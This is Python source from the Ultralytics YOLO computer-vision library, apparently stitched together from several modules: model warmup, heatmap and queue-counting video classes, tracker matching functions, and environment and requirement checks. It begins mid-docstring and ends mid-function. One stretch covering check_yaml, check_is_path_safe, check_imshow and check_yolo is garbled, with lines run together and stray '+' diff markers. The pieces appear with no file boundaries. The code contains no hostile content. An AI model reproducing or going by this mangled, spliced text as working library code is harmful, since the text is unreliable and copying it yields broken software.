    Warm up the model by running forward pass(es) on a dummy input.

    Nothing is run unless at least one of the pt, jit, onnx, engine, saved_model, pb, triton or nn_module flags is
    set, and the device is either not the CPU or the backend is Triton. TorchScript (jit) models get two passes,
    every other backend gets one.

    Args:
        imgsz (tuple): Shape of the dummy input tensor in the format (batch_size, channels, height, width).
    """
    import torchvision  # noqa (import here so torchvision import time not recorded in postprocess time)

    warmable = (self.pt, self.jit, self.onnx, self.engine, self.saved_model, self.pb, self.triton, self.nn_module)
    if not any(warmable):
        return
    if self.device.type == "cpu" and not self.triton:
        return

    dtype = torch.half if self.fp16 else torch.float
    dummy = torch.empty(*imgsz, dtype=dtype, device=self.device)  # uninitialised input, contents are irrelevant
    passes = 2 if self.jit else 1
    for _ in range(passes):
        self.forward(dummy)  # warmup
class Heatmap(ObjectCounter):
    """
    A class to draw heatmaps in real-time video streams based on object tracks.

    This class extends the ObjectCounter class to generate and visualize heatmaps of object movements in video
    streams. Every tracked bounding box adds a filled disc to a cumulative heatmap, which is then normalized,
    color-mapped and blended with the current frame.

    Attributes:
        initialized (bool): Flag indicating whether the heatmap array has been allocated.
        colormap (int): OpenCV colormap used for heatmap visualization.
        heatmap (np.ndarray): Float32 array with the same shape as the first frame, storing the cumulative heatmap.
        annotator (Annotator): Object for drawing annotations on the current frame.

    Methods:
        heatmap_effect: Adds the heat contribution of one bounding box to the cumulative heatmap.
        generate_heatmap: Processes one frame and returns it with the heatmap overlay.

    Examples:
        >>> from ultralytics.solutions import Heatmap
        >>> heatmap = Heatmap(model="yolov8n.pt", colormap=cv2.COLORMAP_JET)
        >>> frame = cv2.imread("frame.jpg")
        >>> processed_frame = heatmap.generate_heatmap(frame)
    """

    def __init__(self, **kwargs):
        """Initializes the Heatmap class for real-time video stream heatmap generation based on object tracks."""
        super().__init__(**kwargs)

        self.initialized = False  # heatmap array is allocated lazily on the first frame
        if self.region is not None:  # check if user provided the region coordinates
            self.initialize_region()

        # store colormap, falling back to PARULA when none is configured
        self.colormap = cv2.COLORMAP_PARULA if self.CFG["colormap"] is None else self.CFG["colormap"]

    def heatmap_effect(self, box):
        """
        Add the heat contribution of one bounding box to the cumulative heatmap.

        A disc centred on the box, with radius equal to half of the box's shorter side, is incremented by 2. The
        region of interest is clipped to the heatmap bounds, so boxes that partially (or fully) fall outside the
        frame only affect the pixels that actually exist instead of raising an indexing error.

        Args:
            box (List[float]): Bounding box coordinates [x0, y0, x1, y1].

        Examples:
            >>> heatmap = Heatmap()
            >>> box = [100, 100, 200, 200]
            >>> heatmap.heatmap_effect(box)
        """
        x0, y0, x1, y1 = map(int, box)
        radius_squared = (min(x1 - x0, y1 - y0) // 2) ** 2
        center_x, center_y = (x0 + x1) // 2, (y0 + y1) // 2  # computed from the unclipped box

        # Clip the ROI to the heatmap so that the mask and the slice always have identical shapes
        height, width = self.heatmap.shape[:2]
        rx0, ry0 = max(x0, 0), max(y0, 0)
        rx1, ry1 = min(x1, width), min(y1, height)
        if rx1 <= rx0 or ry1 <= ry0:
            return  # nothing of the box lies inside the frame

        # Create a meshgrid with region of interest (ROI) for vectorized distance calculations
        xv, yv = np.meshgrid(np.arange(rx0, rx1), np.arange(ry0, ry1))

        # Mask of ROI points whose squared distance from the box centre is within the radius
        within_radius = (xv - center_x) ** 2 + (yv - center_y) ** 2 <= radius_squared

        # The slice is a view, so the masked in-place add updates self.heatmap directly
        self.heatmap[ry0:ry1, rx0:rx1][within_radius] += 2

    def generate_heatmap(self, im0):
        """
        Generate heatmap for each frame using Ultralytics.

        Args:
            im0 (np.ndarray): Input image array for processing.

        Returns:
            (np.ndarray): Processed image with heatmap overlay and object counts (if region is specified).

        Examples:
            >>> heatmap = Heatmap()
            >>> im0 = cv2.imread("image.jpg")
            >>> result = heatmap.generate_heatmap(im0)
        """
        if not self.initialized:
            self.heatmap = np.zeros_like(im0, dtype=np.float32)  # same shape as the frame, all zeros
            self.initialized = True  # Initialize heatmap only once

        self.annotator = Annotator(im0, line_width=self.line_width)  # Initialize annotator
        self.extract_tracks(im0)  # Extract tracks

        # Iterate over bounding boxes, track ids and classes index
        for box, track_id, cls in zip(self.boxes, self.track_ids, self.clss):
            self.heatmap_effect(box)  # accumulate heat for this box

            if self.region is not None:
                self.annotator.draw_region(reg_pts=self.region, color=(104, 0, 123), thickness=self.line_width * 2)
                self.store_tracking_history(track_id, box)  # Store track history
                self.store_classwise_counts(cls)  # store classwise counts in dict
                current_centroid = ((box[0] + box[2]) / 2, (box[1] + box[3]) / 2)
                # Look up the previous position of this track (if any) and perform object counting
                prev_position = None
                if len(self.track_history[track_id]) > 1:
                    prev_position = self.track_history[track_id][-2]
                self.count_objects(current_centroid, track_id, prev_position, cls)  # Perform object counting

        if self.region is not None:
            self.display_counts(im0)  # Display the counts on the frame

        # Normalize, apply colormap to heatmap and combine with original image
        if self.track_data.id is not None:
            im0 = cv2.addWeighted(
                im0,
                0.5,
                cv2.applyColorMap(
                    cv2.normalize(self.heatmap, None, 0, 255, cv2.NORM_MINMAX).astype(np.uint8), self.colormap
                ),
                0.5,
                0,
            )

        self.display_output(im0)  # display output with base class function
        return im0  # return output image for more usage
class QueueManager(BaseSolution):
    """
    Counts how many tracked objects are inside a queue region on every frame of a video stream.

    The class builds on BaseSolution, which supplies tracking, region handling and display helpers (not shown
    here). On each frame the count is reset and recomputed from the current tracks.

    Attributes:
        counts (int): Number of objects counted inside the region for the current frame.
        rect_color (Tuple[int, int, int]): Color used to draw the queue region and the count label background.
        region_length (int): Number of points defining the queue region.
        annotator (Annotator): Drawing helper, re-created for every processed frame.

    Methods:
        process_queue: Processes a single frame and returns it annotated with boxes, tracks and the queue count.

    Examples:
        >>> queue_manager = QueueManager(
        ...     source="video.mp4", region=[(20, 400), (1080, 400), (1080, 360), (20, 360)]
        ... )
        >>> for frame in video_stream:
        ...     processed_frame = queue_manager.process_queue(frame)
        ...     cv2.imshow("Queue Management", processed_frame)
    """

    def __init__(self, **kwargs):
        """Sets up the base solution, the queue region and the per-frame counting state."""
        super().__init__(**kwargs)
        self.initialize_region()
        self.counts = 0  # objects currently counted in the queue
        self.rect_color = (255, 255, 255)  # color of the region outline
        self.region_length = len(self.region)  # cached number of region points

    def process_queue(self, im0):
        """
        Annotate one frame and count the tracked objects that are inside the queue region.

        Steps performed:
            1. Reset the count and create a fresh Annotator for the frame.
            2. Extract tracks and draw the queue region.
            3. For every track: draw its box/label, store its history and draw its centroid trail.
            4. Count the track when the region has at least three points, the track has a previous position and
               its latest track point lies inside the region.
            5. Draw the queue count and hand the frame to the base-class display routine.

        Args:
            im0 (numpy.ndarray): Input image for processing, typically a frame from a video stream.

        Returns:
            (numpy.ndarray): The same image, annotated with bounding boxes, tracks and the queue count.

        Examples:
            >>> queue_manager = QueueManager()
            >>> frame = cv2.imread("frame.jpg")
            >>> processed_frame = queue_manager.process_queue(frame)
        """
        self.counts = 0  # the count is per-frame, not cumulative
        self.annotator = Annotator(im0, line_width=self.line_width)
        self.extract_tracks(im0)

        region_thickness = self.line_width * 2
        self.annotator.draw_region(reg_pts=self.region, color=self.rect_color, thickness=region_thickness)

        for box, track_id, cls in zip(self.boxes, self.track_ids, self.clss):
            # Box with class label, colored per track
            self.annotator.box_label(box, label=self.names[cls], color=colors(track_id, True))
            self.store_tracking_history(track_id, box)

            # Centroid and trail of the current track
            self.annotator.draw_centroid_and_tracks(
                self.track_line, color=colors(int(track_id), True), track_thickness=self.line_width
            )

            # A track only counts once it has a previous position, i.e. it has been seen on at least two frames
            history = self.track_history.get(track_id, [])
            prev_position = history[-2] if len(history) > 1 else None
            if self.region_length < 3 or not prev_position:
                continue
            if self.r_s.contains(self.Point(self.track_line[-1])):
                self.counts += 1

        # Display queue counts
        self.annotator.queue_counts_display(
            f"Queue Counts : {str(self.counts)}",
            points=self.region,
            region_color=self.rect_color,
            txt_color=(104, 31, 17),
        )
        self.display_output(im0)  # display output with base class function

        return im0  # return output image for more usage
def linear_assignment(cost_matrix: np.ndarray, thresh: float, use_lap: bool = True) -> tuple:
    """
    Perform linear assignment using either the scipy or lap.lapjv method.

    Args:
        cost_matrix (np.ndarray): The matrix containing cost values for assignments, with shape (N, M).
        thresh (float): Threshold for considering an assignment valid.
        use_lap (bool): Use lap.lapjv for the assignment. If False, scipy.optimize.linear_sum_assignment is used.

    Returns:
        matches (np.ndarray | list): Matched (row, column) index pairs. The scipy path and the empty-input path
            always return an array of shape (K, 2), including K == 0; the lap path returns a list of [row, col].
        unmatched_a (np.ndarray | list | tuple): Row indices that were not matched.
        unmatched_b (np.ndarray | list | tuple): Column indices that were not matched.

    Examples:
        >>> cost_matrix = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
        >>> thresh = 5.0
        >>> matched_indices, unmatched_a, unmatched_b = linear_assignment(cost_matrix, thresh, use_lap=True)
    """
    n_rows, n_cols = cost_matrix.shape[0], cost_matrix.shape[1]
    if cost_matrix.size == 0:
        return np.empty((0, 2), dtype=int), tuple(range(n_rows)), tuple(range(n_cols))

    if use_lap:
        # Use lap.lapjv
        # https://github.com/gatagat/lap
        _, x, y = lap.lapjv(cost_matrix, extend_cost=True, cost_limit=thresh)
        matches = [[ix, mx] for ix, mx in enumerate(x) if mx >= 0]
        unmatched_a = np.where(x < 0)[0]
        unmatched_b = np.where(y < 0)[0]
    else:
        # Use scipy.optimize.linear_sum_assignment
        # https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.linear_sum_assignment.html
        rows, cols = scipy.optimize.linear_sum_assignment(cost_matrix)  # row x, col y
        keep = cost_matrix[rows, cols] <= thresh  # discard assignments that cost more than the threshold
        matches = np.stack((rows[keep], cols[keep]), axis=1)  # always (K, 2), even when K == 0
        # setdiff1d returns the remaining indices sorted, which keeps the result deterministic
        unmatched_a = np.setdiff1d(np.arange(n_rows), matches[:, 0]).tolist()
        unmatched_b = np.setdiff1d(np.arange(n_cols), matches[:, 1]).tolist()

    return matches, unmatched_a, unmatched_b


def iou_distance(atracks: list, btracks: list) -> np.ndarray:
    """
    Compute cost based on Intersection over Union (IoU) between tracks.

    Args:
        atracks (list[STrack] | list[np.ndarray]): List of tracks 'a' or bounding boxes.
        btracks (list[STrack] | list[np.ndarray]): List of tracks 'b' or bounding boxes.

    Returns:
        (np.ndarray): Cost matrix of shape (len(atracks), len(btracks)) holding 1 - IoU. If either list is empty
            the IoU is left at zero, so every entry (if any) is 1.

    Examples:
        Compute IoU distance between two sets of tracks
        >>> atracks = [np.array([0, 0, 10, 10]), np.array([20, 20, 30, 30])]
        >>> btracks = [np.array([5, 5, 15, 15]), np.array([25, 25, 35, 35])]
        >>> cost_matrix = iou_distance(atracks, btracks)
    """
    if atracks and isinstance(atracks[0], np.ndarray) or btracks and isinstance(btracks[0], np.ndarray):
        # Raw boxes were passed in, use them directly
        atlbrs = atracks
        btlbrs = btracks
    else:
        # Track objects: rotated boxes (xywha) when an angle is available, axis-aligned xyxy otherwise
        atlbrs = [track.xywha if track.angle is not None else track.xyxy for track in atracks]
        btlbrs = [track.xywha if track.angle is not None else track.xyxy for track in btracks]

    ious = np.zeros((len(atlbrs), len(btlbrs)), dtype=np.float32)
    if len(atlbrs) and len(btlbrs):
        boxes_a = np.ascontiguousarray(atlbrs, dtype=np.float32)
        boxes_b = np.ascontiguousarray(btlbrs, dtype=np.float32)
        if len(atlbrs[0]) == 5 and len(btlbrs[0]) == 5:  # 5 values per box -> rotated boxes
            ious = batch_probiou(boxes_a, boxes_b).numpy()
        else:
            ious = bbox_ioa(boxes_a, boxes_b, iou=True)
    return 1 - ious  # cost matrix


def embedding_distance(tracks: list, detections: list, metric: str = "cosine") -> np.ndarray:
    """
    Compute distance between tracks and detections based on embeddings.

    Args:
        tracks (list[STrack]): List of tracks, each exposing a `smooth_feat` embedding.
        detections (list[BaseTrack]): List of detections, each exposing a `curr_feat` embedding.
        metric (str): Metric name passed to scipy's `cdist`, e.g. 'cosine' or 'euclidean'.

    Returns:
        (np.ndarray): Cost matrix computed based on embeddings with shape (N, M), where N is the number of tracks
            and M is the number of detections. Values are clamped to be non-negative.

    Examples:
        Compute the embedding distance between tracks and detections using cosine metric
        >>> tracks = [STrack(...), STrack(...)]  # List of track objects with embedding features
        >>> detections = [BaseTrack(...), BaseTrack(...)]  # List of detection objects with embedding features
        >>> cost_matrix = embedding_distance(tracks, detections, metric="cosine")
    """
    cost_matrix = np.zeros((len(tracks), len(detections)), dtype=np.float32)
    if cost_matrix.size == 0:
        return cost_matrix
    det_features = np.asarray([det.curr_feat for det in detections], dtype=np.float32)
    track_features = np.asarray([track.smooth_feat for track in tracks], dtype=np.float32)
    # Clamp at zero: floating-point error can make distances of (near-)identical features slightly negative
    return np.maximum(0.0, cdist(track_features, det_features, metric))


def fuse_score(cost_matrix: np.ndarray, detections: list) -> np.ndarray:
    """
    Fuses cost matrix with detection scores to produce a single cost matrix.

    The cost is converted to a similarity (1 - cost), each column is scaled by the score of the corresponding
    detection, and the result is converted back to a cost.

    Args:
        cost_matrix (np.ndarray): The matrix containing cost values for assignments, with shape (N, M).
        detections (list[BaseTrack]): List of M detections, each containing a score attribute.

    Returns:
        (np.ndarray): Fused cost matrix with shape (N, M). An empty input is returned unchanged.

    Examples:
        Fuse a cost matrix with detection scores
        >>> cost_matrix = np.random.rand(5, 10)  # 5 tracks and 10 detections
        >>> detections = [BaseTrack(score=np.random.rand()) for _ in range(10)]
        >>> fused_matrix = fuse_score(cost_matrix, detections)
    """
    if cost_matrix.size == 0:
        return cost_matrix
    iou_sim = 1 - cost_matrix
    det_scores = np.array([det.score for det in detections])
    fuse_sim = iou_sim * np.expand_dims(det_scores, axis=0)  # (1, M) broadcasts across the N rows
    return 1 - fuse_sim  # fuse_cost
def parse_version(version="0.0.0") -> tuple:
    """
    Convert a version string to a tuple of integers, ignoring any extra non-numeric string attached to the version.
    This function replaces deprecated 'pkg_resources.parse_version(v)'.

    Args:
        version (str): Version string, i.e. '2.0.1+cpu'

    Returns:
        (tuple): Tuple of at most three integers built from the first numeric groups of the string, i.e.
            '2.0.1+cpu' -> (2, 0, 1). If parsing fails a warning is logged and (0, 0, 0) is returned.
    """
    try:
        numeric_parts = re.findall(r"\d+", version)
        return tuple(int(part) for part in numeric_parts[:3])  # '2.0.1+cpu' -> (2, 0, 1)
    except Exception as e:
        LOGGER.warning(f"WARNING ⚠️ failure for parse_version({version}), returning (0, 0, 0): {e}")
        return 0, 0, 0


def is_ascii(s) -> bool:
    """
    Check if a string is composed of only ASCII characters.

    Args:
        s (Any): Value to be checked; it is converted with `str()` first, so lists, tuples, None, etc. are accepted.

    Returns:
        (bool): True if the string form of `s` contains only ASCII characters, False otherwise.
    """
    return str(s).isascii()


def check_imgsz(imgsz, stride=32, min_dim=1, max_dim=2, floor=0):
    """
    Verify image size is a multiple of the given stride in each dimension. If the image size is not a multiple of the
    stride, update it to the nearest multiple of the stride that is greater than or equal to the given floor value.

    Args:
        imgsz (int | List[int] | Tuple[int] | str): Image size. Strings such as '640', '[640,640]' or '640,480' are
            parsed as Python literals.
        stride (int | torch.Tensor): Stride value; for a tensor its maximum is used.
        min_dim (int): Minimum number of dimensions.
        max_dim (int): Maximum number of dimensions.
        floor (int): Minimum allowed value for image size.

    Returns:
        (int | List[int]): Updated image size. A single value is returned as an int when min_dim == 1 and is
            duplicated to [size, size] when min_dim == 2.

    Raises:
        TypeError: If `imgsz` is not an int, list, tuple or str.
        ValueError: If `imgsz` has more than `max_dim` values and `max_dim` is not 1, or if a string `imgsz` is not
            a plain Python literal.
    """
    # Convert stride to integer if it is a tensor
    stride = int(stride.max() if isinstance(stride, torch.Tensor) else stride)

    # Convert image size to list if it is an integer
    if isinstance(imgsz, int):
        imgsz = [imgsz]
    elif isinstance(imgsz, (list, tuple)):
        imgsz = list(imgsz)
    elif isinstance(imgsz, str):  # i.e. '640' or '[640,640]'
        if imgsz.isnumeric():
            imgsz = [int(imgsz)]
        else:
            import ast  # local import, only needed for literal strings

            # SECURITY: this string may come straight from the command line, so it is parsed with
            # ast.literal_eval (literals only) instead of eval(), which would execute arbitrary code.
            parsed = ast.literal_eval(imgsz)
            # '640,480' parses to a tuple; normalise to a list so the comparison with `sz` below is meaningful
            imgsz = list(parsed) if isinstance(parsed, (list, tuple)) else [parsed]
    else:
        raise TypeError(
            f"'imgsz={imgsz}' is of invalid type {type(imgsz).__name__}. "
            f"Valid imgsz types are int i.e. 'imgsz=640' or list i.e. 'imgsz=[640,640]'"
        )

    # Apply max_dim
    if len(imgsz) > max_dim:
        msg = (
            "'train' and 'val' imgsz must be an integer, while 'predict' and 'export' imgsz may be a [h, w] list "
            "or an integer, i.e. 'yolo export imgsz=640,480' or 'yolo export imgsz=640'"
        )
        if max_dim != 1:
            raise ValueError(f"imgsz={imgsz} is not a valid image size. {msg}")
        LOGGER.warning(f"WARNING ⚠️ updating to 'imgsz={max(imgsz)}'. {msg}")
        imgsz = [max(imgsz)]

    # Make image size a multiple of the stride (rounding up), but never smaller than floor
    sz = [max(math.ceil(x / stride) * stride, floor) for x in imgsz]

    # Print warning message if image size was updated
    if sz != imgsz:
        LOGGER.warning(f"WARNING ⚠️ imgsz={imgsz} must be multiple of max stride {stride}, updating to {sz}")

    # Add missing dimensions if necessary
    sz = [sz[0], sz[0]] if min_dim == 2 and len(sz) == 1 else sz[0] if min_dim == 1 and len(sz) == 1 else sz

    return sz


def check_version(
    current: str = "0.0.0",
    required: str = "0.0.0",
    name: str = "version",
    hard: bool = False,
    verbose: bool = False,
    msg: str = "",
) -> bool:
    """
    Check current version against the required version or range.

    Args:
        current (str): Current version or package name to get version from.
        required (str): Required version or range (in pip-style format). Clauses are separated by commas; whitespace
            around a clause or its operator is ignored. A clause without an operator is treated as '>='.
        name (str, optional): Name to be used in warning message.
        hard (bool, optional): If True, raise a ModuleNotFoundError if the requirement is not met.
        verbose (bool, optional): If True, print warning message if requirement is not met.
        msg (str, optional): Extra message to display if verbose.

    Returns:
        (bool): True if requirement is met, False otherwise. Also True when `current` or `required` is empty, or
            when `required` carries a `sys_platform` marker that does not apply to the running platform.

    Raises:
        ModuleNotFoundError: If `hard` is True and the package is not installed or the requirement is not met.

    Example:
        ```python
        # Check if current version is exactly 22.04
        check_version(current="22.04", required="==22.04")

        # Check if current version is greater than or equal to 22.04
        check_version(current="22.10", required="22.04")  # assumes '>=' inequality if none passed

        # Check if current version is less than or equal to 22.04
        check_version(current="22.04", required="<=22.04")

        # Check if current version is between 20.04 (inclusive) and 22.04 (exclusive)
        check_version(current="21.10", required=">20.04,<22.04")
        ```
    """
    import operator  # local import, keeps the block self-contained

    if not current:  # if current is '' or None
        LOGGER.warning(f"WARNING ⚠️ invalid check_version({current}, {required}) requested, please check values.")
        return True
    elif not current[0].isdigit():  # current is package name rather than version string, i.e. current='ultralytics'
        try:
            name = current  # assigned package name to 'name' arg
            current = metadata.version(current)  # get version string from package name
        except metadata.PackageNotFoundError as e:
            if hard:
                raise ModuleNotFoundError(emojis(f"WARNING ⚠️ {current} package is required but not installed")) from e
            else:
                return False

    if not required:  # if required is '' or None
        return True

    if "sys_platform" in required and (  # i.e. required='<2.4.0,>=1.8.0; sys_platform == "win32"'
        (WINDOWS and "win32" not in required)
        or (LINUX and "linux" not in required)
        or (MACOS and "macos" not in required and "darwin" not in required)
    ):
        return True

    comparators = {
        "==": operator.eq,
        "!=": operator.ne,
        ">=": operator.ge,
        "<=": operator.le,
        ">": operator.gt,
        "<": operator.lt,
    }
    c = parse_version(current)  # '1.2.3' -> (1, 2, 3)
    unmet = []  # clauses that are actually violated, used for the warning message
    for clause in required.strip(",").split(","):
        clause = clause.strip()  # tolerate '>=1.8.0, <2.0'
        if not clause:
            continue  # stray comma
        op, version = re.match(r"([^0-9]*)([\d.]+)", clause).groups()  # split '>=22.04' -> ('>=', '22.04')
        op = op.strip() or ">="  # tolerate '>= 22.04'; assume >= if no op passed
        compare = comparators.get(op)  # operators outside this table (e.g. '~=') are not enforced
        if compare is not None and not compare(c, parse_version(version)):
            unmet.append(f"{op}{version}")

    result = not unmet
    if not result:
        warning = (
            f"WARNING ⚠️ {name}{','.join(unmet)} is required, but {name}=={current} is currently installed {msg}"
        )
        if hard:
            raise ModuleNotFoundError(emojis(warning))  # assert version requirements met
        if verbose:
            LOGGER.warning(warning)
    return result


def check_latest_pypi_version(package_name="ultralytics"):
    """
    Returns the latest version of a PyPI package without downloading or installing it.

    Args:
        package_name (str): The name of the package to find the latest version for.

    Returns:
        (str | None): The latest version of the package, or None if the request fails, times out (3 s) or does not
            return HTTP 200.
    """
    try:
        requests.packages.urllib3.disable_warnings()  # Disable the InsecureRequestWarning
        response = requests.get(f"https://pypi.org/pypi/{package_name}/json", timeout=3)
        if response.status_code == 200:
            return response.json()["info"]["version"]
    except Exception:
        return None  # best-effort lookup: any failure simply means "unknown"
    return None
@ThreadingLocked()
def check_font(font="Arial.ttf"):
    """
    Locate a font file, downloading it to the user's configuration directory as a last resort.

    Lookup order: a file with the same name in USER_CONFIG_DIR, then any system font whose path contains `font`,
    then a download from the Ultralytics assets release.

    Args:
        font (str): Path or name of font.

    Returns:
        file (Path | str | None): Path inside USER_CONFIG_DIR (existing or freshly downloaded), or the first
            matching system font path as a string. None if the font is not found and the download URL is
            unavailable.
    """
    from matplotlib import font_manager

    # 1. Already present in USER_CONFIG_DIR
    font_name = Path(font).name
    local_file = USER_CONFIG_DIR / font_name
    if local_file.exists():
        return local_file

    # 2. Installed as a system font
    system_matches = [path for path in font_manager.findSystemFonts() if font in path]
    if any(system_matches):
        return system_matches[0]

    # 3. Download to USER_CONFIG_DIR if missing
    url = f"https://github.com/ultralytics/assets/releases/download/v0.0.0/{font_name}"
    if downloads.is_url(url, check=True):
        downloads.safe_download(url=url, file=local_file)
        return local_file


def check_python(minimum: str = "3.8.0", hard: bool = True, verbose: bool = False) -> bool:
    """
    Check current python version against the required minimum version.

    This is a thin wrapper that forwards PYTHON_VERSION and the arguments to `check_version`.

    Args:
        minimum (str): Required minimum version of python.
        hard (bool, optional): Forwarded to `check_version`; if True an unmet requirement raises instead of
            returning False.
        verbose (bool, optional): If True, print warning message if requirement is not met.

    Returns:
        (bool): Whether the installed Python version meets the minimum constraints.
    """
    return check_version(current=PYTHON_VERSION, required=minimum, name="Python", hard=hard, verbose=verbose)


@TryExcept()
def check_requirements(requirements=ROOT.parent / "requirements.txt", exclude=(), install=True, cmds=""):
    """
    Check if installed dependencies meet YOLOv8 requirements and attempt to auto-update if needed.

    Args:
        requirements (Union[Path, str, List[str]]): Path to a requirements.txt file, a single package requirement as a
            string, or a list of package requirements as strings.
        exclude (Tuple[str]): Tuple of package names to exclude from checking (only applied when a file is given).
        install (bool): If True, attempt to auto-update packages that don't meet requirements.
        cmds (str): Additional commands to pass to the pip install command when auto-updating.

    Returns:
        (bool): True if every requirement is met or the auto-update succeeded, False if requirements are unmet and
            no install was attempted or the install failed.

    Example:
        ```python
        from ultralytics.utils.checks import check_requirements

        # Check a requirements.txt file
        check_requirements("path/to/requirements.txt")

        # Check a single package
        check_requirements("ultralytics>=8.0.0")

        # Check multiple packages
        check_requirements(["numpy", "ultralytics>=8.0.0"])
        ```
    """
    prefix = colorstr("red", "bold", "requirements:")

    # Normalise the input to a list of requirement strings
    if isinstance(requirements, Path):  # requirements.txt file
        file = requirements.resolve()
        assert file.exists(), f"{prefix} {file} not found, check failed."
        requirements = [f"{x.name}{x.specifier}" for x in parse_requirements(file) if x.name not in exclude]
    elif isinstance(requirements, str):
        requirements = [requirements]

    # Collect every requirement that is missing or installed at an unsuitable version
    pkgs = []
    for requirement in requirements:
        tail = requirement.split("/")[-1].replace(".git", "")  # replace git+https://org/repo.git -> 'repo'
        match = re.match(r"([a-zA-Z0-9-_]+)([<>!=~]+.*)?", tail)
        name = match[1]
        required = match[2].strip() if match[2] else ""
        try:
            assert check_version(metadata.version(name), required)  # exception if requirements not met
        except (AssertionError, metadata.PackageNotFoundError):
            pkgs.append(requirement)

    @Retry(times=2, delay=1)
    def attempt_install(packages, commands):
        """Attempt pip install command with retries on failure."""
        return subprocess.check_output(f"pip install --no-cache-dir {packages} {commands}", shell=True).decode()

    s = " ".join(f'"{x}"' for x in pkgs)  # console string
    if not s:
        return True  # nothing to install
    if not (install and AUTOINSTALL):  # check environment variable
        return False

    n = len(pkgs)  # number of packages updates
    LOGGER.info(f"{prefix} Ultralytics requirement{'s' * (n > 1)} {pkgs} not found, attempting AutoUpdate...")
    try:
        t = time.time()
        assert ONLINE, "AutoUpdate skipped (offline)"
        LOGGER.info(attempt_install(s, cmds))
        dt = time.time() - t
        LOGGER.info(
            f"{prefix} AutoUpdate success ✅ {dt:.1f}s, installed {n} package{'s' * (n > 1)}: {pkgs}\n"
            f"{prefix} ⚠️ {colorstr('bold', 'Restart runtime or rerun command for updates to take effect')}\n"
        )
    except Exception as e:
        LOGGER.warning(f"{prefix} ❌ {e}")
        return False

    return True
def check_suffix(file="yolo11n.pt", suffix=".pt", msg=""):
    """
    Check file(s) for an acceptable suffix.

    Args:
        file (str | Path | list | tuple): File name(s) to check. A falsy value skips the check.
        suffix (str | tuple): Acceptable suffix(es) including the dot. File suffixes are lower-cased before
            comparison, so these should be given in lower case.
        msg (str): Text prepended to the assertion message.

    Raises:
        AssertionError: If a file has a non-empty suffix that is not listed in `suffix`.
    """
    if file and suffix:
        if isinstance(suffix, str):
            suffix = (suffix,)
        for f in file if isinstance(file, (list, tuple)) else [file]:
            s = Path(f).suffix.lower().strip()  # file suffix
            if len(s):  # files without any suffix are accepted
                assert s in suffix, f"{msg}{f} acceptable suffix is {suffix}, not {s}"


def check_yolov5u_filename(file: str, verbose: bool = True):
    """
    Replace legacy YOLOv3/YOLOv5 filenames with updated 'u' filenames.

    Args:
        file (str): Model filename or path, i.e. 'yolov5n.pt' or 'weights/yolov5n.pt'.
        verbose (bool): If True, log a tip when the filename was changed.

    Returns:
        (str): The updated filename, or the input unchanged if no legacy pattern matched.
    """
    if "yolov3" in file or "yolov5" in file:
        if "u.yaml" in file:
            file = file.replace("u.yaml", ".yaml")  # i.e. yolov5nu.yaml -> yolov5n.yaml
        elif ".pt" in file:
            # NOTE: no '"u" not in file' guard here. The patterns below only match names that do NOT already end
            # in 'u', and a whole-path guard wrongly skipped files such as 'runs/yolov5n.pt'.
            original_file = file
            file = re.sub(r"(.*yolov5([nsmlx]))\.pt", "\\1u.pt", file)  # i.e. yolov5n.pt -> yolov5nu.pt
            file = re.sub(r"(.*yolov5([nsmlx])6)\.pt", "\\1u.pt", file)  # i.e. yolov5n6.pt -> yolov5n6u.pt
            file = re.sub(r"(.*yolov3(|-tiny|-spp))\.pt", "\\1u.pt", file)  # i.e. yolov3-spp.pt -> yolov3-sppu.pt
            if file != original_file and verbose:
                LOGGER.info(
                    f"PRO TIP 💡 Replace 'model={original_file}' with new 'model={file}'.\nYOLOv5 'u' models are "
                    f"trained with https://github.com/ultralytics/ultralytics and feature improved performance vs "
                    f"standard YOLOv5 models trained with https://github.com/ultralytics/yolov5.\n"
                )
    return file


def check_model_file_from_stem(model="yolov8n"):
    """
    Return a model filename from a valid model stem.

    Args:
        model (str | Path): Model name. A '.pt' suffix is added only when the name has no suffix and its stem is
            listed in `downloads.GITHUB_ASSETS_STEMS`.

    Returns:
        (Path | str): `Path` with '.pt' appended for known stems, otherwise `model` unchanged.
    """
    if model and not Path(model).suffix and Path(model).stem in downloads.GITHUB_ASSETS_STEMS:
        return Path(model).with_suffix(".pt")  # add suffix, i.e. yolov8n -> yolov8n.pt
    return model
len(files) else [] # return file + + +def check_yaml(file, suffix=(".yaml", ".yml"), hard=True): + """Search/download YAML file (if necessary) and return path, checking suffix.""" + return check_file(file, suffix, hard=hard) + + +def check_is_path_safe(basedir, path): + """ + Check if the resolved path is under the intended directory to prevent path traversal. + + Args: + basedir (Path | str): The intended directory. + path (Path | str): The path to check. + + Returns: + (bool): True if the path is safe, False otherwise. + """ + base_dir_resolved = Path(basedir).resolve() + path_resolved = Path(path).resolve() + + return path_resolved.exists() and path_resolved.parts[: len(base_dir_resolved.parts)] == base_dir_resolved.parts + + +def check_imshow(warn=False): + """Check if environment supports image displays.""" + try: + if LINUX: + assert not IS_COLAB and not IS_KAGGLE + assert "DISPLAY" in os.environ, "The DISPLAY environment variable isn't set." + cv2.imshow("test", np.zeros((8, 8, 3), dtype=np.uint8)) # show a small 8-pixel image + cv2.waitKey(1) + cv2.destroyAllWindows() + cv2.waitKey(1) + return True + except Exception as e: + if warn: + LOGGER.warning(f"WARNING ⚠️ Environment does not support cv2.imshow() or PIL Image.show()\n{e}") + return False + + +def check_yolo(verbose=True, device=""): + """Return a human-readable YOLO software and hardware summary.""" + import psutil + + from ultralytics.utils.torch_utils import select_device + + if IS_COLAB: + shutil.rmtree("sample_data", ignore_errors=True) # remove colab /sample_data directory + + if verbose: + # System info + gib = 1 << 30 # bytes per GiB + ram = psutil.virtual_memory().total + total, used, free = shutil.disk_usage("/") + s = f"({os.cpu_count()} CPUs, {ram / gib:.1f} GB RAM, {(total - free) / gib:.1f}/{total / gib:.1f} GB disk)" + try: + from IPython import display + + display.clear_output() # clear display if notebook + except ImportError: + pass + else: + s = "" + + select_device(device=device, 
def collect_system_info():
    """
    Collect and print relevant system information including OS, Python, RAM, CPU, and CUDA.

    Returns:
        (dict): The logged values keyed by label, plus a "Package Info" sub-dict with one entry per ultralytics
            requirement and, when running inside GitHub Actions, a "GitHub Info" sub-dict.
    """
    import psutil

    from ultralytics.utils import ENVIRONMENT  # scope to avoid circular import
    from ultralytics.utils.torch_utils import get_cpu_info, get_gpu_info

    gib = 1 << 30  # bytes per GiB
    cuda = torch and torch.cuda.is_available()
    check_yolo()
